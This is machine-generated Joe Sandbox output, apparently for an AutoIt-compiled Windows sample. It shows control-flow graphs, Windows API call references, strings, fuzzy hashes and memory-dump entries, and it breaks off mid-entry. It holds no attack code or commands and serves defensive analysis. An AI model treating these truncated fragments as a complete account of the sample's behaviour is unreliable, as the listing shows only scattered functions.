                                                            • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                            • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2085 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2090 404a06 2085->2090 2091 404b0b-404b0d 2085->2091 2092 404a09-404a0e 2090->2092 2093 43d767-43d773 2091->2093 2095 404b12-404b13 2092->2095 2096 404a14 2092->2096 2094 43d774-43d778 2093->2094 2097 43d77b-43d787 2094->2097 2098 43d77a 2094->2098 2099 404a15-404a4c call 407d2c call 407726 2095->2099 2096->2099 2097->2094 2100 43d789-43d78e 2097->2100 2098->2097 2108 404a52-404a53 2099->2108 2109 43d864-43d867 2099->2109 2100->2092 2102 43d794-43d79b 2100->2102 2102->2093 2104 43d79d 2102->2104 2107 43d7a2-43d7a5 2104->2107 2110 404a93-404aaa GetCurrentProcess IsWow64Process 2107->2110 2111 43d7ab-43d7c9 2107->2111 2108->2107 2112 404a59-404a64 2108->2112 2113 43d880-43d884 2109->2113 2114 43d869 2109->2114 2117 404aac 2110->2117 2118 404aaf-404ac0 2110->2118 2111->2110 2119 43d7cf-43d7d5 2111->2119 2120 43d7ea-43d7f0 2112->2120 2121 404a6a-404a6c 2112->2121 2115 43d886-43d88f 2113->2115 2116 43d86f-43d878 2113->2116 2122 43d86c 2114->2122 2115->2122 2125 43d891-43d894 2115->2125 2116->2113 2117->2118 2126 404ac2-404ad2 call 404b37 2118->2126 2127 404b2b-404b35 GetSystemInfo 2118->2127 2128 43d7d7-43d7da 2119->2128 2129 43d7df-43d7e5 2119->2129 2123 43d7f2-43d7f5 2120->2123 2124 43d7fa-43d800 2120->2124 2130 404a72-404a75 2121->2130 2131 43d805-43d811 2121->2131 2122->2116 2123->2110 2124->2110 2125->2116 2142 404ad4-404ae1 call 404b37 2126->2142 2143 404b1f-404b29 GetSystemInfo 2126->2143 2132 404af8-404b08 2127->2132 2128->2110 2129->2110 2136 43d831-43d834 2130->2136 2137 404a7b-404a8a 2130->2137 2133 43d813-43d816 2131->2133 2134 43d81b-43d821 2131->2134 2133->2110 2134->2110 2136->2110 2139 43d83a-43d84f 2136->2139 2140 404a90 2137->2140 2141 43d826-43d82c 2137->2141 2144 43d851-43d854 2139->2144 2145 43d859-43d85f 2139->2145 2140->2110 2141->2110 2150 404ae3-404ae7 GetNativeSystemInfo 2142->2150 2151 404b18-404b1d 2142->2151 2146 404ae9-404aed 2143->2146 2144->2110 2145->2110 2146->2132 2149 404aef-404af2 FreeLibrary 2146->2149 2149->2132 2150->2146 2151->2150
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                            • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                            • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                            • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2152 404e89-404ea1 CreateStreamOnHGlobal 2153 404ec1-404ec6 2152->2153 2154 404ea3-404eba FindResourceExW 2152->2154 2155 43d933-43d942 LoadResource 2154->2155 2156 404ec0 2154->2156 2155->2156 2157 43d948-43d956 SizeofResource 2155->2157 2156->2153 2157->2156 2158 43d95c-43d967 LockResource 2157->2158 2158->2156 2159 43d96d-43d975 2158->2159 2160 43d979-43d98b 2159->2160 2160->2156
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                            • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                            • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                            • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                            • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: pD$%I
                                                            • API String ID: 3964851224-4040355302
                                                            • Opcode ID: a9c8ef4fda0b7e55d89722692ea3cf0021274fdfe5a7acec23e971159d777e66
                                                            • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                            • Opcode Fuzzy Hash: a9c8ef4fda0b7e55d89722692ea3cf0021274fdfe5a7acec23e971159d777e66
                                                            • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.$pD
                                                            • API String ID: 0-3145290137
                                                            • Opcode ID: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
                                                            • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                            • Opcode Fuzzy Hash: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
                                                            • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                            • FindClose.KERNEL32(00000000), ref: 0046448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                            • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                            • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                            • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                            • timeGetTime.WINMM ref: 00410D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                            • DestroyWindow.USER32 ref: 00410F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                            • TranslateMessage.USER32(?), ref: 00445C60
                                                            • DispatchMessageW.USER32(?), ref: 00445C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pD
                                                            • API String ID: 4212290369-4240826242
                                                            • Opcode ID: 992f45e81dcc9556020dd72de597c80dd6be193c0b5d75ab4febd2bc204f2c1e
                                                            • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                            • Opcode Fuzzy Hash: 992f45e81dcc9556020dd72de597c80dd6be193c0b5d75ab4febd2bc204f2c1e
                                                            • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorFreeLast
                                                            • String ID:
                                                            • API String ID: 1762890227-0
                                                            • Opcode ID: 261563487ac7e1487e7b978ab2f87f3f8f8de302e6529fba6403e657510639a6
                                                            • Instruction ID: e3e92bb58cb4b459bfea0b61cf6cadb9d7c39e5f66a3cd3d4320e41553d7a6e6
                                                            • Opcode Fuzzy Hash: 261563487ac7e1487e7b978ab2f87f3f8f8de302e6529fba6403e657510639a6
                                                            • Instruction Fuzzy Hash: 83F11720ACC3809ECB3646284C4C7352AE5DB76770F5DC6DAE47DEA1F2DE648D049267

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1129 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1142 46920b-469212 call 469734 1129->1142 1143 4692b8-4692bf call 469734 1129->1143 1148 4692c1-4692c3 1142->1148 1149 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1142->1149 1143->1148 1150 4692c8 1143->1150 1151 46952a-46952b 1148->1151 1153 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1149->1153 1150->1153 1155 469548-469558 call 405211 1151->1155 1188 469390-4693ab call 468fa5 1153->1188 1189 469389-46938b 1153->1189 1192 4693b1-4693b9 1188->1192 1193 46943d-469449 call 4253a6 1188->1193 1189->1151 1194 4693c1 1192->1194 1195 4693bb-4693bf 1192->1195 1200 46945f-469463 1193->1200 1201 46944b-46945a DeleteFileW 1193->1201 1197 4693c6-4693e4 call 404f0b 1194->1197 1195->1197 1207 4693e6-4693eb 1197->1207 1208 46940e-469424 call 468953 call 424863 1197->1208 1203 469505-469519 CopyFileW 1200->1203 1204 469469-4694f2 call 4240bb call 4699ea call 468b06 1200->1204 1201->1151 1205 46952d-469543 DeleteFileW call 4698a2 1203->1205 1206 46951b-469528 DeleteFileW 1203->1206 1204->1205 1225 4694f4-469503 DeleteFileW 1204->1225 1205->1155 1206->1151 1213 4693ee-469401 call 4690dd 1207->1213 1222 469429-469434 1208->1222 1220 469403-46940c 1213->1220 1220->1208 1222->1192 1224 46943a 1222->1224 1224->1193 1225->1151
                                                            APIs
                                                              • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                              • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                            • __wsplitpath.LIBCMT ref: 00469234
                                                              • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                            • _wcscpy.LIBCMT ref: 00469247
                                                            • _wcscat.LIBCMT ref: 0046925A
                                                            • __wsplitpath.LIBCMT ref: 0046927F
                                                            • _wcscat.LIBCMT ref: 00469295
                                                            • _wcscat.LIBCMT ref: 004692A8
                                                              • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                              • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                            • _wcscmp.LIBCMT ref: 004691EF
                                                              • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                              • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                            • _wcsncpy.LIBCMT ref: 004694C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 42ca5def20852a3b51acdf0d31bf7b6556b1a546efe55efa71e12235d2c80c01
                                                            • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                            • Opcode Fuzzy Hash: 42ca5def20852a3b51acdf0d31bf7b6556b1a546efe55efa71e12235d2c80c01
                                                            • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                            • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                            • LoadIconW.USER32(000000A9), ref: 004030F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                            • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                            • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                            • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                            • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                            • LoadIconW.USER32(000000A9), ref: 004030F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                            • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                            • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                            • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1295 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1312 43e8b1-43e8cc RegQueryValueExW 1295->1312 1313 4071b6-4071d3 call 405904 * 2 1295->1313 1315 43e943-43e94f RegCloseKey 1312->1315 1316 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1312->1316 1315->1313 1318 43e955-43e959 1315->1318 1329 43e92b-43e931 1316->1329 1330 43e90f-43e929 call 407bcc 1316->1330 1321 43e95e-43e984 call 4079f2 * 2 1318->1321 1336 43e986-43e994 call 4079f2 1321->1336 1337 43e9a9-43e9b6 call 422bfc 1321->1337 1331 43e933-43e940 call 420e2c * 2 1329->1331 1332 43e941 1329->1332 1330->1329 1331->1332 1332->1315 1336->1337 1345 43e996-43e9a7 call 422d8d 1336->1345 1347 43e9b8-43e9c9 call 422bfc 1337->1347 1348 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1337->1348 1356 43ea1c-43ea1d 1345->1356 1347->1348 1357 43e9cb-43e9db call 422d8d 1347->1357 1348->1313 1348->1356 1356->1321 1357->1348
                                                            APIs
                                                              • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                              • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                            • _wcscat.LIBCMT ref: 0043E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: 615a27587bbb07de26543ae543ac43dcfb9f0781619c7b342562d257d4b1b3f1
